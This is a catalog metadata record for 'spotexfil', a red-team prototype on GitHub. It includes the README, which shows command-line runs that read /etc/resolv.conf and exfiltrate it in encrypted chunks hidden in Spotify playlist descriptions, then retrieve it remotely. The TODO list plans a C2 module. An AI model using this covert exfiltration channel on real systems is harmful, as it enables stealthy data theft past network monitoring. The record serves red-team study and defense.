{"id":13506196,"url":"https://github.com/sourcefrenchy/spotexfil","last_synced_at":"2026-01-17T11:04:51.594Z","repository":{"id":133106373,"uuid":"180835040","full_name":"sourcefrenchy/spotexfil","owner":"sourcefrenchy","description":"A simple way to exfiltrate data using spotify API","archived":false,"fork":false,"pushed_at":"2025-12-16T23:43:55.000Z","size":86,"stargazers_count":19,"open_issues_count":0,"forks_count":1,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-12-20T13:53:22.074Z","etag":null,"topics":["exfiltrate-data","exfiltration","payload","redteam","redteaming","spotify-api"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/sourcefrenchy.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2019-04-11T16:39:08.000Z","updated_at":"2025-12-16T23:43:51.000Z","dependencies_parsed_at":"2023-07-03T16:31:39.837Z","dependency_job_id":"f37ef07a-a452-4dd3-9259-339c15a0019b","html_url":"https://github.com/sourcefrenchy/spotexfil","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/sourcefrenchy/spotexfil","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sourcefrenchy%2Fspotexfil","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sourcefrenchy%2Fspotexfil/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sourcefrenchy%2Fspotexfil/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sourcefrenchy%2Fspotexfil/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/sourcefrenchy","download_url":"https://codeload.github.com/sourcefrenchy/spotexfil/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sourcefrenchy%2Fspotexfil/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28506593,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-17T10:25:30.148Z","status":"ssl_error","status_checked_at":"2026-01-17T10:25:29.718Z","response_time":85,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["exfiltrate-data","exfiltration","payload","redteam","redteaming","spotify-api"],"created_at":"2024-08-01T01:00:36.607Z","updated_at":"2026-01-17T11:04:51.568Z","avatar_url":"https://github.com/sourcefrenchy.png","language":"Python","funding_links":[],"categories":["[↑](#table-of-contents) Steganography"],"sub_categories":[],"readme":"[![CodeQL](https://github.com/sourcefrenchy/spotexfil/actions/workflows/codeql-analysis.yml/badge.svg)](https://github.com/sourcefrenchy/spotexfil/actions/workflows/codeql-analysis.yml)\n\n# spotexfil (status: prototype)\nA simple attempt to exfiltrate data using spotify API, 300 bytes at a time.\n\nWe can read a mini file (payload) and encode it inside a playlist description field via Spotify API.\nReally MVP/prototype, not meant for large files.\n\nMore info at https://medium.com/@jeanmichel.amblat/exfiltration-series-spotexfil-9aee76382b74\n\n# Pre-requisite\nYou need to register the app with Spotiy at https://developer.spotify.com/dashboard/\n\nThen, after using the first time, the following environment variables should be set such as:\n```\nSPOTIFY_USERNAME=YourSpotifyUsername\nSPOTIFY_CLIENT_SECRET=0de477a0733545a1a40e2e35d7b9d897\nSPOTIFY_CLIENT_ID=3a292c314830b8611963ac4fb2f29da1b\nSPOTIFY_REDIRECTURI=http://DOMAIN:PORT/PATH\n```\n\n# Usage\n\nUsing /etc/resolv.conf as payload:\n\n```\n$ ./spotexfil_client.py -f /etc/resolv.conf\n[*] Data cleared\n\"0614b19d74be941ac3a89fdcbc33d3ebc62cb996f574a1b3cb95867c1db90b87ca154ad38151a25e09d2b9429f66ad8d00afb005b1e257f89c27b030ca46ae3b6856574d3bc40476fd3c0703618f4ac4810dc59b7797dc1a873252de1017fd12205e99458eb0f40c4fa98db36cc972ec3c7f008541450e8269679fd6e54cf09ac432e002fdfb3be3ae85fa89373e0ad3c68af7bde50\n\t[*] Creating inpayloadwetrust0\nb5118c7d5947d2f1a467069e3f2796b3859015741622226f58609dcee056954b42520dfeb8d09c1280fffb1e2c7178c3d46e0203b6284e14d08868e75bef729b939fee6e4edcd0e463f5b2797b40640eabf8940bfb8e82bde4bed531310b6e496066bad02a1a7bc4c854ef070a14166a6cd55f0c8f17c9c9ffaf79bef38c3dfaf6fd9d0ef1baf62589aad3c39bafd768cbe7ee48a10b\n\t[*] Creating inpayloadwetrust300\n728a9be5127a45b5aa4b1a6f6cbd216f1e0ae80d843ad2f15a07ae721773eb529ea64963557196ba8bd29eca370ff3a8ae6d32f67251edb078619a4d97db332ccf432402a3a45b5675b82e6f8\"\n\t[*] Creating inpayloadwetrust600\n[*] Data encoded and sent\n```\n\nReceiving from a far:\n\n$ ./spotexfil_retrieve.py -r\n```\n#\n# macOS Notice\n#\n# This file is not consulted for DNS hostname resolution, address\n# resolution, or the DNS query routing mechanism used by most\n# processes on this system.\n#\n# To view the DNS configuration used by this system, use:\n#   scutil --dns\n#\n# SEE ALSO\n#   dns-sd(1), scutil(8)\n#\n# This file is automatically generated.\n#\ndomain nyc.rr.com\nnameserver 172.16.0.1\n```\n\n# TODO\n* Working on Empire C2C module\n* move from XXTEA crappy easy crypto to asymmetric (working in separate branch)\n* peer-review from a real Python developper would help :P\n* build chat system, adding a realtime listener component into spotexfil_server.py\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsourcefrenchy%2Fspotexfil","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsourcefrenchy%2Fspotexfil","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsourcefrenchy%2Fspotexfil/lists"}